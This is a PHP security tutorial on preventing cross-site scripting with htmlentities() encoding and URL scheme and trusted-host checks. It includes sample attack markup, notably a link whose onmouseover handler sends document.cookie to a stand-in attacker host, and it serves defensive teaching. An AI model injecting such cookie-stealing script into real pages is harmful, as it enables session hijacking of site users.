Preventing XSS attack in PHP


Sometimes a webpage pops up unnecessary alerts, submits forms unexpectedly, or even displays a huge stack of fake links to untrusted websites. The website has probably been attacked using cross-site scripting, also known as an XSS attack. This tutorial covers what this attack is, what it can do, and how to prevent it.

What is it?

Cross-site scripting attacks typically involve more than one website (which makes them cross-site), and they involve some sort of scripting. Such an attack attempts to insert malicious markup or JavaScript code into values that are subsequently displayed in a web page. This malicious code attempts to take advantage of a user’s trust in a website by tricking the user (or the user’s browser) into performing some action or submitting some information to another, untrusted site.

The malicious code inserted into an application can be very destructive. It can do almost anything: take remote control of the client browser, reveal the value of a cookie, change links on the page (indeed, modify any part of the DOM), redirect to another URI, render a bogus form that collects and forwards information to an attacker, or initiate some other undesirable action. The very variety of possible exploits is what makes them so hard to pin down in definition, and to guard against.

Types of attack

Remote Site to Application Site

This type of attack is launched externally, from either an email message or another website. The user is tricked into clicking a link, loading an image, or submitting a form in which a malicious payload is secreted; that payload then accomplishes something undesirable in the application. This usually requires that the user possess an active session on the application site (otherwise, there is no point to the attack). However, depending on the nature of the attack and the application’s login mechanism, the attacking payload might be able to make its way through the login process intact.

An example of such a payload is a URI like the following, where $_GET['subject'] is the subject of a new guestbook post:


<a href='http://guestbook.example.org/addComment.php?subject=I%20am%20owned'>
Check it out!</a>

This sort of attack provides a compelling reason why email clients should not automatically load images from untrusted sites, because an image’s src attribute could cause the email client to automatically send a GET request to a third party. It is also a reason why your applications should relentlessly expire sessions that have been unused for some period of time. A user who has a secure connection open to your application but has gone off multitasking on a chat site represents a significant threat to the security of your application and your data.
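Expiring idle sessions can be sketched roughly as follows. This is a minimal illustration rather than a complete session manager: the 15-minute limit, the 'last_activity' session key and the helper names sessionIsStale() and enforceIdleTimeout() are all assumptions made for the example.

```php
<?php

// Assumed idle limit for this sketch: 15 minutes.
const MAX_IDLE_SECONDS = 900;

// Hypothetical helper: true when the session has been idle for too long.
function sessionIsStale( $lastActivity, $now, $maxIdle = MAX_IDLE_SECONDS ) {
    return ( $now - $lastActivity ) > $maxIdle;
}

// Hypothetical helper meant to be called at the top of every protected page.
function enforceIdleTimeout() {
    session_start();
    $now = time();
    if ( isset( $_SESSION['last_activity'] )
        && sessionIsStale( $_SESSION['last_activity'], $now ) ) {
        // throw away the stale session data and the session itself
        $_SESSION = array();
        session_destroy();
        return false;
    }
    // the session is still fresh, so record this request as the latest activity
    $_SESSION['last_activity'] = $now;
    return true;
}
```

A page would call enforceIdleTimeout() before doing anything else and send the user back to the login form when it returns false.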

Application Site to Same or Remote Site

This type of attack is launched locally, exploiting a user’s trust in your application (which leads her to expect that any links appearing in the application are authentic) to accomplish a nefarious purpose. The attacker embeds a malicious payload into a comment or some other string of user input that the application stores. When the page with the embedded string is loaded and processed by a user’s browser, some undesirable action is carried out, either on the same site (technically same-site scripting) or by means of a remote URI (cross-site). An example of this is a link like the following:


<a href="#" onmouseover="window.location='http://reallybadguys.net/collectCookie.php?cookie=' +
encodeURIComponent(document.cookie);"> Check it out!</a>

As soon as a user hovers over this link to discover just what it is she should check out, the attacker’s JavaScript is triggered, which redirects the browser to a PHP script that steals her session cookie, which is URL-encoded and passed as $_GET['cookie'].

How to prevent it?

Effective XSS prevention starts when the interface is being designed, not in the final testing stage.

For example, applications that rely on form submission (POST requests) are much less vulnerable to attack than those that allow control via URI query strings (GET requests). It is important, then, before writing the first line of interface code, to set out a clear policy as to which actions and variables will be allowed as $_GET values, and which must come from $_POST values.
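Such a policy can be written down as a small lookup table that is consulted before any action runs. The sketch below is only one possible shape for it: the action names, the $actionPolicy array and the requestIsAllowed() helper are hypothetical and not part of any framework.

```php
<?php

// Hypothetical policy table: which actions may arrive by which HTTP method.
$actionPolicy = array(
    'viewComments'  => array( 'GET', 'POST' ), // read-only, safe to link to
    'addComment'    => array( 'POST' ),        // changes data, form submission only
    'deleteComment' => array( 'POST' ),
);

// Hypothetical helper: decide whether an action may be carried out
// for the HTTP method that the request actually used.
function requestIsAllowed( $action, $method, array $policy ) {
    if ( !isset( $policy[$action] ) ) {
        return false; // unknown actions are refused outright
    }
    return in_array( strtoupper( $method ), $policy[$action], true );
}
```

In a real page the arguments would come from the request, for example requestIsAllowed( $action, $_SERVER['REQUEST_METHOD'], $actionPolicy ). Under this table, a link that tries to add a guestbook comment through a query string is refused because 'addComment' only accepts POST.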

The main strategy for preventing XSS is, simply, never to allow user input to remain untouched. In this section, we describe two ways to massage or filter user input to ensure (as much as is possible) that it is not capable of creating an XSS exploit.

Encode HTML Entities

As mentioned already, one common method for carrying out an XSS attack involves injecting an HTML element with an src or onload attribute that launches the attacking script. PHP’s htmlentities() function (information is at http://php.net/htmlentities) will translate all characters with HTML entity equivalents into those entities, thus rendering them harmless. Its sibling htmlspecialchars() is more limited: it converts only the characters that are special in HTML markup (&, <, > and quotation marks). That is also enough to neutralize injected markup, but this tutorial uses htmlentities() throughout.


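<?php

    function safe( $value ) {
        // encode every character that has an HTML entity equivalent
        // and keep the result (htmlentities() does not modify its argument)
        $value = htmlentities( $value, ENT_QUOTES, 'UTF-8' );
        // other processing
        return $value;
    }

    // retrieve $title and $message from user input
    $title = isset( $_POST['title'] ) ? $_POST['title'] : '';
    $message = isset( $_POST['message'] ) ? $_POST['message'] : '';

    // and display them safely
    print '<h1>' . safe( $title ) . '</h1>
          <p>' . safe( $message ) . '</p>';

?>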

This fragment is remarkably straightforward. After retrieving the user’s input, you pass it to the safe() function, which simply applies PHP’s htmlentities() function to any value carried into it. When the result is displayed as element content or inside a quoted attribute value, this prevents HTML from being embedded, and therefore prevents JavaScript embedding as well. You then display the resulting safe versions of the input.
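To see what the encoding does to a typical payload, here is a small standalone sketch. The function name safeOutput() and the payload string are made up for the illustration; the function does the same job as safe() so that the example runs on its own.

```php
<?php

// Hypothetical standalone encoder in the spirit of safe().
function safeOutput( $value ) {
    return htmlentities( $value, ENT_QUOTES, 'UTF-8' );
}

// An example of what an attacker might type into a comment field.
$payload = "<script>alert('xss')</script>";

echo safeOutput( $payload ), "\n";
// prints: &lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;
```

The browser shows the encoded string as literal text instead of running it as a script.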

When called with ENT_QUOTES, the htmlentities() function also converts both double and single quotation marks to entities, which will ensure safe handling for both of the following possible form elements:


<input type="text" name="myval" value="<?= safe( $myval ) ?>" />
<input type='text' name='yourval' value='<?= safe( $yourval ) ?>' />

The second input (with single quotation marks) is perfectly legal (although possibly slightly unusual) markup, and if $yourval has an unescaped apostrophe or single quotation mark left in it after encoding, the input field can be broken and markup inserted into the page.

Therefore, the ENT_QUOTES parameter should always be used with htmlentities(). It is this parameter that tells htmlentities() to convert a single quotation mark to its entity &#039; and a double quotation mark to its entity &quot;. While most browsers will render this, some older clients might not, which is why htmlentities() offers a choice of quotation mark translation schemes. The ENT_QUOTES setting is more conservative than either ENT_COMPAT (which converts only double quotation marks) or ENT_NOQUOTES (which converts neither), which is why we recommend it.
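The difference between the quotation mark schemes is easiest to see with a value that targets a single-quoted attribute. The following is a small sketch; the payload is invented for the illustration.

```php
<?php

// A value an attacker might submit to break out of a single-quoted attribute.
$yourval = "' onmouseover='alert(1)";

$compat = htmlentities( $yourval, ENT_COMPAT, 'UTF-8' ); // leaves ' untouched
$quotes = htmlentities( $yourval, ENT_QUOTES, 'UTF-8' ); // encodes both ' and "

echo "<input type='text' name='yourval' value='" . $compat . "' />\n";
// prints: <input type='text' name='yourval' value='' onmouseover='alert(1)' />

echo "<input type='text' name='yourval' value='" . $quotes . "' />\n";
// prints: <input type='text' name='yourval' value='&#039; onmouseover=&#039;alert(1)' />
```

In the first line of output the attacker’s apostrophe closes the value attribute and the rest becomes a new onmouseover attribute. In the second, the whole string stays inside the value.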

URL Sanitization

If you allow users to specify a URI (for example, to specify a personal icon or avatar, or to create image-based links as in a directory or catalog), you must ensure that they cannot use URIs contaminated with javascript: or vbscript: specifications. PHP’s parse_url() function (information is at http://php.net/parse_url) will split a URI into an associative array of parts. This makes it easy to check what the scheme key points to (something allowable like http or ftp, or something impermissible like javascript).
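A scheme check along these lines might look like the sketch below. The helper name hasAllowedScheme() and the list of permitted schemes are assumptions for the example; an application should choose its own list.

```php
<?php

// Hypothetical helper: accept a URI only when its scheme is on a whitelist.
function hasAllowedScheme( $uri, array $allowed = array( 'http', 'https', 'ftp' ) ) {
    $scheme = parse_url( $uri, PHP_URL_SCHEME );
    // parse_url() gives null when there is no scheme and false on malformed input
    if ( !is_string( $scheme ) ) {
        return false;
    }
    // compare in lower case so that "JavaScript:" cannot slip through
    return in_array( strtolower( $scheme ), $allowed, true );
}
```

Checking against a list of allowed schemes, rather than a list of forbidden ones, means that a scheme nobody thought of is rejected by default. This sketch also rejects relative URIs, because they carry no scheme at all.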

The array returned by parse_url() also helpfully contains a query key, which points to an appended query string (that is, a $_GET variable or series of them) if one exists. It thus becomes easy to disallow query strings on URIs. There may, however, be some instances in which stripping off the query portion of a URI will frustrate your users, as when they want to refer to a site with a URI like


http://example.com/pages.asp?pageId=23&lang=fr

You might then wish to allow query portions on URIs for explicitly trusted sites, so that a user could legitimately enter the preceding URI for example.com but is not allowed to enter http://bank.example.com/transfer/?amount=1000. A further protection for user-submitted links is to write the domain name of the link in plaintext next to the link itself, Slashdot style:
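One way to express this rule is a check that accepts a query string only when the host is explicitly trusted. This is a rough sketch: the helper name queryIsAcceptable() is hypothetical, and the list of trusted hosts is passed in as a parameter.

```php
<?php

// Hypothetical helper: a query string is acceptable only on trusted hosts.
function queryIsAcceptable( $uri, array $trustedHosts ) {
    $parts = parse_url( $uri );
    if ( !is_array( $parts ) ) {
        return false; // the URI could not be parsed at all
    }
    if ( !isset( $parts['query'] ) ) {
        return true;  // no query string, nothing to object to
    }
    // a query string is present, so the host must be on the trusted list
    return isset( $parts['host'] )
        && in_array( strtolower( $parts['host'] ), $trustedHosts, true );
}
```

With array( 'example.com' ) as the trusted list, the pages.asp URI above is accepted, while the bank.example.com transfer URI is refused.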


Hey, go to <a href="http://reallybadguys.net/trap.php">photos.com</a> 
[reallybadguys.net] to see my passport photo!

The theory behind this defense is that the typical user would think twice before following the link to an unknown or untrusted site, especially one with a sinister name. Slashdot switched to this system after users made a sport out of tricking unsuspecting readers into visiting a large photo of a man engaged in an activity that we choose not to describe here, located at http://goatse.cx (the entire incident is described in detail at http://en.wikipedia.org/wiki/Slashdot_trolling_phenomena and http://en.wikipedia.org/wiki/Goatse.cx). Most Slashdot readers learned quickly to avoid links marked [goatse.cx], no matter how enticing the link text was.


<?php

    // hosts whose links we are willing to vouch for
    $trustedHosts = array(
        'example.com',
        'another.example.com'
    );

    function safeURI( $value ) {
        // accessing the global list of trusted hosts
        global $trustedHosts;

        // parsing the URI; parse_url() returns false for seriously malformed input
        $uriParts = parse_url( $value );
        $host = ( is_array( $uriParts ) && isset( $uriParts['host'] ) ) ? $uriParts['host'] : '';

        // encode the URI itself, because it is user input that will be displayed
        $display = htmlentities( $value, ENT_QUOTES, 'UTF-8' );

        // check if the host is trusted
        if ( in_array( $host, $trustedHosts, true ) ) {
            return $display . ' [trusted host]';
        }
        return $display . ' [untrusted host]';
    }

    // retrieve 'uri' from user input
    $uri = isset( $_REQUEST['uri'] ) ? $_REQUEST['uri'] : '';

    // and display it safely
    echo safeURI( $uri );

?>

This code fragment is again very straightforward. You create an array of the hosts that are trusted, and a function that compares the host part of the user-submitted URI (obtained with the parse_url() function) to the items in the trusted host array. If you find a match, you return the URI with the suffix '[trusted host]'. If you don’t find a match, you return the URI with the suffix '[untrusted host]' instead. In either case, you have given the user a label (trusted/untrusted) next to the URI, and thus an opportunity to make a reasoned decision about whether to click the link.
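The Slashdot-style display described earlier, where the real host is written in plaintext next to the link, can be sketched in a similar way. The helper name linkWithHost() is hypothetical, and the sketch assumes that the URI scheme has already been checked elsewhere.

```php
<?php

// Hypothetical helper: render a user-submitted link followed by its real host.
function linkWithHost( $uri, $text ) {
    $host = parse_url( $uri, PHP_URL_HOST );
    if ( !is_string( $host ) ) {
        $host = 'unknown host'; // no host could be extracted from the URI
    }
    // every piece of user input is encoded before it reaches the page
    return '<a href="' . htmlentities( $uri, ENT_QUOTES, 'UTF-8' ) . '">'
         . htmlentities( $text, ENT_QUOTES, 'UTF-8' ) . '</a> ['
         . htmlentities( $host, ENT_QUOTES, 'UTF-8' ) . ']';
}

echo linkWithHost( 'http://reallybadguys.net/trap.php', 'photos.com' ), "\n";
// prints: <a href="http://reallybadguys.net/trap.php">photos.com</a> [reallybadguys.net]
```

The bracketed host is taken from the URI itself rather than from the link text, so the attacker cannot control what it says.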

Wrap Up

In this tutorial we have covered what an XSS attack is, how dangerous it can be, and how to prevent it. It’s important to note that, apart from the prevention methods described above, good general coding practices must be followed when designing and developing an application in order to secure it against attackers.

I'm Krishna Teja. I'm a computer science engineer by qualification, a physics teacher by profession and a programmer by interest. I'm an expert in building visually stunning web apps using javascript, ...